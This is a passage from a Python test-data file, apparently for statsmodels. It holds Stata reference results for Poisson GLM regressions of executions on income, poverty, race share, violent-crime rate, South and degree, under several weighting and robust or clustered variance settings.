8.932124278e-10, 1.512127962e-06, 1.877263788e-07, -4.562869239e-06,
-2.023379829e-06, -.00001228516761, -.00002423071544, 1.512127962e-06,
.00708057955662, .00028427703202, -.0019549511748, -.00596332288528,
.20022061835302, -.18678265108673, 1.877263788e-07, .00028427703202,
.00037906590775, -.00453407701816, -.00623061980467, -.04659404972535,
.02694184589715, -4.562869239e-06, -.0019549511748, -.00453407701816,
.13040895071706, .0836259691825, .89260578257395, -.82275604425197,
-2.023379829e-06, -.00596332288528, -.00623061980467, .0836259691825,
.18575111691225, 1.0698498854979, -.64859219982217, -.00001228516761,
.20022061835302, -.04659404972535, .89260578257395, 1.0698498854979,
20.383111057299, -12.482192460755, -.00002423071544, -.18678265108673,
.02694184589715, -.82275604425197, -.64859219982217, -12.482192460755,
11.559736577902]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, np.nan, -52.969418473462, 7,
119.93883694692, 125.77133035532])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
34.815238952637, .06858423352242, 7.3026847839355, .25687274336815,
1.2540435791016, .41320022940636, 3.9734709262848, .16020278632641,
2.0739872455597, .22170753777027, 1.1471545696259, .51121062040329,
1.7763512134552, .2167394310236, 2.2698366641998, .2456086575985,
1.6349502801895, .25546172261238, 2.7504913806915, .4417819082737,
2.862185716629, .61734634637833, 3.5617923736572, .51518148183823,
2.6135795116425, .34006628394127, .775799036026, .292076587677,
.93375068902969, .39795544743538, .56681954860687, .31529840826988,
1.8914022445679, .26116076111794]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
resids = np.array([
2.1847612857819, 2.1847612857819, .36650228500366, .36649596691132,
.3702706694603, .06275302171707, 1.6973150968552, 1.6973150968552,
.60597640275955, .60585051774979, .62808901071548, .23242343962193,
4.7459564208984, 4.7459564208984, 3.0897438526154, 3.0483965873718,
4.2380628585815, 3.7845225334167, .02652905881405, .02652905881405,
.01329397037625, .01329396758229, .01330873556435, .00667654490098,
.92601269483566, .92601269483566, .60273587703705, .60233747959137,
.64300429821014, .44648909568787, .8528453707695, .8528453707695,
.72065913677216, .71955502033234, .7962681055069, .7434441447258,
.22364875674248, .22364875674248, .16446639597416, .16445553302765,
.16780391335487, .12590345740318, -.26983660459518, -.26983660459518,
-.1828535348177, -.18284019827843, -.1791032999754, -.11887931078672,
-.63495022058487, -.63495022058487, -.53598040342331, -.53542107343674,
-.49657794833183, -.38836058974266, -1.7504912614822, -1.7504912614822,
-1.2204585075378, -1.2154930830002, -1.0554916858673, -.63642859458923,
-1.862185716629, -1.862185716629, -1.2788465023041, -1.2732635736465,
-1.1007128953934, -.65061664581299, -2.5617923736572, -2.5617923736572,
-1.617108464241, -1.6071890592575, -1.3574055433273, -.71924245357513,
-1.6135795116425, -1.6135795116425, -1.1469231843948, -1.1426799297333,
-.99809640645981, -.61738300323486, .22420094907284, .22420094907284,
.24363535642624, .24356025457382, .25454398989677, .28899359703064,
.06624934077263, .06624934077263, .06777309626341, .06777160614729,
.06855925172567, .07094971090555, .43318045139313, .43318045139313,
.51954871416092, .51871728897095, .57536894083023, .76422989368439,
-.89140218496323, -.89140218496323, -.7140833735466, -.7128586769104,
-.64815932512283, -.47129172086716]).reshape(17,6)
resids_colnames = 'score_factor resid_response resid_anscombe resid_deviance resid_pearson resid_working'.split()
resids_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_pweight_nonrobust = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
resids=resids,
resids_colnames=resids_colnames,
resids_rownames=resids_rownames,
**est
)
est = dict(
k_eq_model = 0,
phi = 1,
vf = 1,
df = 10,
df_m = 6,
power = 0,
canonical = 1,
rank = 7,
aic = 4.579685683305704,
rc = 0,
p = 5.09268495340e-76,
chi2 = 366.2131475852884,
ll = -31.92732830809848,
k_autoCns = 0,
converged = 1,
k_dv = 1,
k_eq = 1,
k = 7,
ic = 3,
N = 17,
nbml = 0,
bic = -9.740492454486454,
dispers_ps = 2.475374834715614,
deviance_ps = 24.75374834715614,
dispers_p = 2.475374834715614,
deviance_p = 24.75374834715614,
dispers_s = 1.859164098607571,
deviance_s = 18.59164098607571,
dispers = 1.859164098607571,
deviance = 18.59164098607571,
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree, family(poisson) vce(robust)",
cmd = "glm",
predict = "glim_p",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
marginsok = "default",
hac_lag = "15",
vcetype = "Robust",
vce = "robust",
linkt = "Log",
linkf = "ln(u)",
varfunct = "Poisson",
varfuncf = "u",
opt1 = "ML",
oim = "oim",
a = "1",
m = "1",
varfunc = "glim_v3",
link = "glim_l03",
chi2type = "Wald",
opt = "moptimize",
title = "Generalized linear models",
user = "glim_lf",
crittype = "log pseudolikelihood",
ml_method = "e2",
singularHmethod = "m-marquardt",
technique = "nr",
which = "max",
depvar = "executions",
properties = "b V",
)
params_table = np.array([
.00026110166569, .00003534474167, 7.3872845963787, 1.498576223e-13,
.00019182724497, .0003303760864, np.nan, 1.9599639845401,
0, .07781804809828, .09819599835909, .79247677500784,
.42808272865983, -.11464257211148, .27027866830805, np.nan,
1.9599639845401, 0, -.09493110013466, .01944446025221,
-4.8821668950083, 1.049263903e-06, -.13304154192782, -.0568206583415,
np.nan, 1.9599639845401, 0, .29693462055586,
.34917491559373, .85038932436186, .39510866948496, -.38743563831266,
.98130487942439, np.nan, 1.9599639845401, 0,
2.3011832004524, .45717041903387, 5.0335347709405, 4.815174289e-07,
1.405145644349, 3.1972207565559, np.nan, 1.9599639845401,
0, -18.722067603077, 4.5006120067298, -4.1598937155841,
.00003183957242, -27.543105044656, -9.9010301614985, np.nan,
1.9599639845401, 0, -6.8014789919532, 3.48445447794,
-1.9519494471841, .05094420680386, -13.630884274485, .02792629057847,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
1.249250764e-09, 2.158351725e-06, 1.068227835e-07, -5.170410321e-06,
-5.047866044e-07, -.00001662944527, -.00004339679838, 2.158351725e-06,
.00964245409374, .00008635335196, -.00640596402935, -.00524426268669,
.23390140895418, -.22653903184676, 1.068227835e-07, .00008635335196,
.0003780870345, -.00382751790532, -.0064534643179, -.05137117620883,
.02948709519544, -5.170410321e-06, -.00640596402935, -.00382751790532,
.12192312167989, .0907733380116, .89729289134262, -.69004336039169,
-5.047866044e-07, -.00524426268669, -.0064534643179, .0907733380116,
.20900479203961, .93952111535021, -.75843860743141, -.00001662944527,
.23390140895418, -.05137117620883, .89729289134262, .93952111535021,
20.25550843512, -12.691830440798, -.00004339679838, -.22653903184676,
.02948709519544, -.69004336039169, -.75843860743141, -12.691830440798,
12.141423008836]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, np.nan, -31.927328308098, 7,
77.854656616197, 83.68715002459])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
35.226364135742, .05631958693266, 8.1965742111206, .14089094102383,
1.3118965625763, .51714926958084, 3.6862981319427, .20286601781845,
2.0823004245758, .27275583148003, 1.0650315284729, .58616667985916,
1.9260421991348, .30098018050194, 2.4171404838562, .34251752495766,
1.8473218679428, .29685723781586, 2.8643238544464, .47364214062691,
3.1211984157562, .72507524490356, 3.338207244873, .54493451118469,
2.5269968509674, .34425318241119, .89725440740585, .37162157893181,
.97933322191238, .50227928161621, .53462094068527, .40906101465225,
1.9790935516357, .33805811405182]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_none_hc1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
k_eq_model = 0,
phi = 1,
vf = 1,
df = 26,
df_m = 6,
power = 0,
canonical = 1,
rank = 7,
aic = 3.634510210512826,
rc = 0,
p = 1.5690245831e-115,
chi2 = 549.7874580263729,
ll = -52.96941847346162,
k_autoCns = 0,
converged = 1,
k_dv = 1,
k_eq = 1,
k = 7,
ic = 3,
N = 33,
nbml = 0,
bic = -67.5595014539113,
dispers_ps = 1.156216988842385,
deviance_ps = 30.06164170990202,
dispers_p = 1.156216988842385,
deviance_p = 30.06164170990202,
dispers_s = .8980651978545075,
deviance_s = 23.34969514421719,
dispers = .8980651978545075,
deviance = 23.34969514421719,
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [fweight=fweight], family(poisson) vce(robust)",
cmd = "glm",
predict = "glim_p",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
marginsok = "default",
hac_lag = "15",
vcetype = "Robust",
vce = "robust",
linkt = "Log",
linkf = "ln(u)",
varfunct = "Poisson",
varfuncf = "u",
opt1 = "ML",
oim = "oim",
a = "1",
m = "1",
varfunc = "glim_v3",
link = "glim_l03",
wexp = "= fweight",
wtype = "fweight",
chi2type = "Wald",
opt = "moptimize",
title = "Generalized linear models",
user = "glim_lf",
crittype = "log pseudolikelihood",
ml_method = "e2",
singularHmethod = "m-marquardt",
technique = "nr",
which = "max",
depvar = "executions",
properties = "b V",
)
params_table = np.array([
.00025343868829, .0000263369674, 9.6229259983619, 6.398464168e-22,
.00020181918073, .00030505819585, np.nan, 1.9599639845401,
0, .09081422305585, .07431850776812, 1.2219597215163,
.22172285914198, -.05484737555444, .23647582166613, np.nan,
1.9599639845401, 0, -.09416451429381, .01609416304158,
-5.8508487860178, 4.890707145e-09, -.12570849421662, -.06262053437099,
np.nan, 1.9599639845401, 0, .27652273809506,
.34481886883624, .80193621372381, .42258985672342, -.3993098260138,
.95235530220392, np.nan, 1.9599639845401, 0,
2.239890838384, .39682271484988, 5.6445630619491, 1.656012749e-08,
1.4621326090308, 3.0176490677372, np.nan, 1.9599639845401,
0, -18.842583191417, 4.1473740870735, -4.5432562377589,
5.539185130e-06, -26.971287032495, -10.713879350338, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.0810023455152,
-2.1301515097173, .03315910688542, -12.601655431235, -.52434816424841,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
6.936358517e-10, 1.301395377e-06, 1.497821854e-07, -4.758016826e-06,
-1.852598001e-06, -6.904571080e-06, -.00001327109619, 1.301395377e-06,
.00552324059688, .00014714335792, -.00376147485446, -.00118957690573,
.15979100738539, -.13853266210904, 1.497821854e-07, .00014714335792,
.00025902208401, -.00418693954572, -.00513741847691, -.03987504442994,
.02761179707845, -4.758016826e-06, -.00376147485446, -.00418693954572,
.1189000523055, .08682729933237, .80541854027627, -.70545315416752,
-1.852598001e-06, -.00118957690573, -.00513741847691, .08682729933237,
.15746826702083, 1.1366624064282, -.75098089879076, -6.904571080e-06,
.15979100738539, -.03987504442994, .80541854027627, 1.1366624064282,
17.200711818129, -11.062121016981, -.00001327109619, -.13853266210904,
.02761179707845, -.70545315416752, -.75098089879076, -11.062121016981,
9.49257545307]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
33, np.nan, -52.969418473462, 7,
119.93883694692, 130.41438987719])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
34.815238952637, .06608480215073, 7.3026847839355, .23366995155811,
1.2540435791016, .39606991410255, 3.9734709262848, .12350843846798,
2.0739872455597, .18263976275921, 1.1471545696259, .39735752344131,
1.7763512134552, .17952646315098, 2.2698366641998, .21028706431389,
1.6349502801895, .17675416171551, 2.7504913806915, .42150634527206,
2.862185716629, .58209121227264, 3.5617923736572, .49835306406021,
2.6135795116425, .2456089258194, .775799036026, .23251366615295,
.93375068902969, .35320028662682, .56681954860687, .26245352625847,
1.8914022445679, .20374123752117]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_fweight_hc1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
k_eq_model = 0,
phi = 1,
vf = 1,
df = 10,
df_m = 6,
power = 0,
canonical = 1,
rank = 7,
aic = 4.033797198035106,
rc = 0,
p = 5.72458312675e-74,
chi2 = 356.663774965618,
ll = -27.28727618329841,
k_autoCns = 0,
converged = 1,
k_dv = 1,
k_eq = 1,
k = 7,
ic = 3,
N = 17,
nbml = 0,
bic = -16.30350260869269,
dispers_ps = 1.548630027479802,
deviance_ps = 15.48630027479802,
dispers_p = 1.548630027479802,
deviance_p = 15.48630027479802,
dispers_s = 1.202863083186947,
deviance_s = 12.02863083186947,
dispers = 1.202863083186947,
deviance = 12.02863083186947,
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], family(poisson) vce(robust)",
cmd = "glm",
predict = "glim_p",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
marginsok = "default",
hac_lag = "15",
vcetype = "Robust",
vce = "robust",
linkt = "Log",
linkf = "ln(u)",
varfunct = "Poisson",
varfuncf = "u",
opt1 = "ML",
oim = "oim",
a = "1",
m = "1",
varfunc = "glim_v3",
link = "glim_l03",
wexp = "= fweight",
wtype = "aweight",
chi2type = "Wald",
opt = "moptimize",
title = "Generalized linear models",
user = "glim_lf",
crittype = "log pseudolikelihood",
ml_method = "e2",
singularHmethod = "m-marquardt",
technique = "nr",
which = "max",
depvar = "executions",
properties = "b V",
)
params_table = np.array([
.00025343868829, .0000298866597, 8.4799937786833, 2.252059827e-17,
.00019486191167, .00031201546491, np.nan, 1.9599639845401,
0, .09081422305585, .08414617969118, 1.0792435662455,
.28047916301948, -.0741092585755, .25573770468719, np.nan,
1.9599639845401, 0, -.09416451429381, .01946961498728,
-4.8364856909248, 1.321547815e-06, -.13232425846174, -.05600477012587,
np.nan, 1.9599639845401, 0, .27652273809507,
.36112179485206, .76573261995541, .44383541350425, -.43126297384744,
.98430845003758, np.nan, 1.9599639845401, 0,
2.239890838384, .4309885345485, 5.1971007551988, 2.024206636e-07,
1.3951688329193, 3.0846128438488, np.nan, 1.9599639845401,
0, -18.842583191417, 4.5147658917496, -4.1735460139472,
.00002998950578, -27.691361737876, -9.9938046449574, np.nan,
1.9599639845401, 0, -6.5630017977417, 3.3999612612367,
-1.9303166399474, .05356761651539, -13.226803418597, .10079982311369,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
8.932124278e-10, 1.512127962e-06, 1.877263788e-07, -4.562869239e-06,
-2.023379829e-06, -.00001228516761, -.00002423071544, 1.512127962e-06,
.00708057955662, .00028427703202, -.00195495117479, -.00596332288528,
.2002206183531, -.1867826510868, 1.877263788e-07, .00028427703202,
.00037906590775, -.00453407701816, -.00623061980468, -.04659404972537,
.02694184589718, -4.562869239e-06, -.00195495117479, -.00453407701816,
.13040895071718, .08362596918255, .89260578257483, -.82275604425296,
-2.023379829e-06, -.00596332288528, -.00623061980468, .08362596918255,
.18575111691226, 1.0698498854982, -.64859219982256, -.00001228516761,
.2002206183531, -.04659404972537, .89260578257483, 1.0698498854982,
20.383111057306, -12.482192460764, -.00002423071544, -.1867826510868,
.02694184589718, -.82275604425296, -.64859219982256, -12.482192460764,
11.55973657791]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, np.nan, -27.287276183298, 7,
68.574552366597, 74.40704577499])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
34.815238952637, .06858423352242, 7.3026847839355, .25687274336815,
1.2540435791016, .41320022940636, 3.9734709262848, .16020278632641,
2.0739872455597, .22170753777027, 1.1471545696259, .51121062040329,
1.7763512134552, .2167394310236, 2.2698366641998, .2456086575985,
1.6349502801895, .25546172261238, 2.7504913806915, .4417819082737,
2.862185716629, .61734634637833, 3.5617923736572, .51518148183823,
2.6135795116425, .34006628394127, .775799036026, .292076587677,
.93375068902969, .39795544743538, .56681954860687, .31529840826988,
1.8914022445679, .26116076111794]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_aweight_hc1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
k_eq_model = 0,
phi = 1,
vf = 1,
df = 10,
df_m = 6,
power = 0,
canonical = 1,
rank = 7,
aic = 7.055225702760191,
rc = 0,
p = 5.72458312679e-74,
chi2 = 356.6637749656061,
ll = -52.96941847346162,
k_autoCns = 0,
converged = 1,
k_dv = 1,
k_eq = 1,
k = 7,
ic = 3,
N = 17,
nbml = 0,
bic = -4.982438296344967,
dispers_ps = 3.006164170990202,
deviance_ps = 30.06164170990202,
dispers_p = 3.006164170990202,
deviance_p = 30.06164170990202,
dispers_s = 2.33496951442172,
deviance_s = 23.34969514421719,
dispers = 2.33496951442172,
deviance = 23.34969514421719,
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [pweight=fweight], family(poisson) vce(robust)",
cmd = "glm",
predict = "glim_p",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
marginsok = "default",
hac_lag = "15",
vcetype = "Robust",
vce = "robust",
linkt = "Log",
linkf = "ln(u)",
varfunct = "Poisson",
varfuncf = "u",
opt1 = "ML",
oim = "oim",
a = "1",
m = "1",
varfunc = "glim_v3",
link = "glim_l03",
wexp = "= fweight",
wtype = "pweight",
chi2type = "Wald",
opt = "moptimize",
title = "Generalized linear models",
user = "glim_lf",
crittype = "log pseudolikelihood",
ml_method = "e2",
singularHmethod = "m-marquardt",
technique = "nr",
which = "max",
depvar = "executions",
properties = "b V",
)
params_table = np.array([
.00025343868829, .0000298866597, 8.4799937786829, 2.252059827e-17,
.00019486191167, .00031201546491, np.nan, 1.9599639845401,
0, .09081422305585, .08414617969117, 1.0792435662456,
.28047916301946, -.07410925857549, .25573770468718, np.nan,
1.9599639845401, 0, -.09416451429381, .01946961498728,
-4.8364856909253, 1.321547815e-06, -.13232425846174, -.05600477012587,
np.nan, 1.9599639845401, 0, .27652273809506,
.36112179485191, .76573261995571, .44383541350407, -.43126297384714,
.98430845003726, np.nan, 1.9599639845401, 0,
2.239890838384, .43098853454849, 5.1971007551989, 2.024206636e-07,
1.3951688329193, 3.0846128438487, np.nan, 1.9599639845401,
0, -18.842583191417, 4.5147658917489, -4.1735460139479,
.00002998950578, -27.691361737874, -9.9938046449589, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.3999612612355,
-1.930316639948, .0535676165153, -13.226803418595, .10079982311137,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
8.932124278e-10, 1.512127962e-06, 1.877263788e-07, -4.562869239e-06,
-2.023379829e-06, -.00001228516761, -.00002423071544, 1.512127962e-06,
.00708057955662, .00028427703202, -.0019549511748, -.00596332288528,
.20022061835302, -.18678265108673, 1.877263788e-07, .00028427703202,
.00037906590775, -.00453407701816, -.00623061980467, -.04659404972535,
.02694184589715, -4.562869239e-06, -.0019549511748, -.00453407701816,
.13040895071706, .0836259691825, .89260578257395, -.82275604425197,
-2.023379829e-06, -.00596332288528, -.00623061980467, .0836259691825,
.18575111691225, 1.0698498854979, -.64859219982217, -.00001228516761,
.20022061835302, -.04659404972535, .89260578257395, 1.0698498854979,
20.383111057299, -12.482192460755, -.00002423071544, -.18678265108673,
.02694184589715, -.82275604425197, -.64859219982217, -12.482192460755,
11.559736577902]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, np.nan, -52.969418473462, 7,
119.93883694692, 125.77133035532])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
34.815238952637, .06858423352242, 7.3026847839355, .25687274336815,
1.2540435791016, .41320022940636, 3.9734709262848, .16020278632641,
2.0739872455597, .22170753777027, 1.1471545696259, .51121062040329,
1.7763512134552, .2167394310236, 2.2698366641998, .2456086575985,
1.6349502801895, .25546172261238, 2.7504913806915, .4417819082737,
2.862185716629, .61734634637833, 3.5617923736572, .51518148183823,
2.6135795116425, .34006628394127, .775799036026, .292076587677,
.93375068902969, .39795544743538, .56681954860687, .31529840826988,
1.8914022445679, .26116076111794]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_pweight_hc1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
k_eq_model = 0,
vf = 1,
df = 10,
df_m = 6,
power = 0,
canonical = 1,
rank = 7,
aic = 4.579685683305704,
rc = 0,
p = 4.1950730971e-123,
chi2 = 584.908728768987,
ll = -31.92732830809848,
N_clust = 9,
k_autoCns = 0,
converged = 1,
k_dv = 1,
k_eq = 1,
k = 7,
ic = 3,
N = 17,
nbml = 0,
bic = -9.740492454486454,
dispers_ps = 2.475374834715614,
deviance_ps = 24.75374834715614,
dispers_p = 2.475374834715614,
deviance_p = 24.75374834715614,
dispers_s = 1.859164098607571,
deviance_s = 18.59164098607571,
dispers = 1.859164098607571,
deviance = 18.59164098607571,
phi = 1,
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree, family(poisson) vce(cluster id)",
cmd = "glm",
predict = "glim_p",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
marginsok = "default",
hac_lag = "15",
vcetype = "Robust",
vce = "cluster",
linkt = "Log",
linkf = "ln(u)",
varfunct = "Poisson",
varfuncf = "u",
opt1 = "ML",
clustvar = "id",
oim = "oim",
a = "1",
m = "1",
varfunc = "glim_v3",
link = "glim_l03",
chi2type = "Wald",
opt = "moptimize",
title = "Generalized linear models",
user = "glim_lf",
crittype = "log pseudolikelihood",
ml_method = "e2",
singularHmethod = "m-marquardt",
technique = "nr",
which = "max",
depvar = "executions",
properties = "b V",
)
params_table = np.array([
.00026110166569, .00004098448535, 6.3707440379489, 1.881133617e-10,
.00018077355048, .0003414297809, np.nan, 1.9599639845401,
0, .07781804809828, .11602998752167, .67067186475175,
.50242959011024, -.14959654857083, .3052326447674, np.nan,
1.9599639845401, 0, -.09493110013466, .02432927475974,
-3.9019288931601, .00009542919351, -.14261560243373, -.04724659783559,
np.nan, 1.9599639845401, 0, .29693462055586,
.31774950884716, .93449277587615, .35004976070702, -.32584297288986,
.91971221400158, np.nan, 1.9599639845401, 0,
2.3011832004524, .54874508731474, 4.1935376801516, .00002746374324,
1.2256625926223, 3.3767038082826, np.nan, 1.9599639845401,
0, -18.722067603077, 2.8106198749749, -6.6611880780372,
2.716227723e-11, -24.230781332261, -13.213353873894, np.nan,
1.9599639845401, 0, -6.8014789919532, 3.1571598785659,
-2.1543029981246, .03121641791743, -12.989398647377, -.61355933652912,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
1.679728039e-09, 4.034336761e-06, 1.735749447e-07, -5.093610363e-06,
-4.552211884e-06, .00001563785418, -.00009230028034, 4.034336761e-06,
.01346295800428, .00110922683659, -.01950093608551, -.02957572460439,
.08545644123676, -.23518641056668, 1.735749447e-07, .00110922683659,
.00059191361033, -.00720622811203, -.01195031391163, -.04317371228367,
.03351736744645, -5.093610363e-06, -.01950093608551, -.00720622811203,
.10096475037261, .13375578883899, .49763538443989, -.27357574414228,
-4.552211884e-06, -.02957572460439, -.01195031391163, .13375578883899,
.30112117085206, .65342245458316, -.47102547759356, .00001563785418,
.08545644123676, -.04317371228367, .49763538443989, .65342245458316,
7.8995840816039, -6.5824964755966, -.00009230028034, -.23518641056668,
.03351736744645, -.27357574414228, -.47102547759356, -6.5824964755966,
9.9676584988266]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, np.nan, -31.927328308098, 7,
77.854656616197, 83.68715002459])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
35.226364135742, .05941947177052, 8.1965742111206, .09018591046333,
1.3118965625763, .53127920627594, 3.6862981319427, .23996050655842,
2.0823004245758, .33554902672768, 1.0650315284729, .53513532876968,
1.9260421991348, .32360115647316, 2.4171404838562, .33078169822693,
1.8473218679428, .32581362128258, 2.8643238544464, .46489810943604,
3.1211984157562, .71297109127045, 3.338207244873, .58515930175781,
2.5269968509674, .42410242557526, .89725440740585, .40493285655975,
.97933322191238, .5560839176178, .53462094068527, .419488966465,
1.9790935516357, .3438538312912]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_none_clu1 = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
**est
)
est = dict(
k_eq_model = 0,
vf = 1,
df = 26,
df_m = 6,
power = 0,
canonical = 1,
rank = 7,
aic = 3.634510210512826,
rc = 0,
p = 6.87057569032e-91,
chi2 = 435.380362705941,
ll = -52.96941847346162,
N_clust = 9,
k_autoCns = 0,
converged = 1,
k_dv = 1,
k_eq = 1,
k = 7,
ic = 3,
N = 33,
nbml = 0,
bic = -67.5595014539113,
dispers_ps = 1.156216988842385,
deviance_ps = 30.06164170990202,
dispers_p = 1.156216988842385,
deviance_p = 30.06164170990202,
dispers_s = .8980651978545075,
deviance_s = 23.34969514421719,
dispers = .8980651978545075,
deviance = 23.34969514421719,
phi = 1,
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [fweight=fweight], family(poisson) vce(cluster id)",
cmd = "glm",
predict = "glim_p",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
marginsok = "default",
hac_lag = "15",
vcetype = "Robust",
vce = "cluster",
linkt = "Log",
linkf = "ln(u)",
varfunct = "Poisson",
varfuncf = "u",
opt1 = "ML",
clustvar = "id",
oim = "oim",
a = "1",
m = "1",
varfunc = "glim_v3",
link = "glim_l03",
wexp = "= fweight",
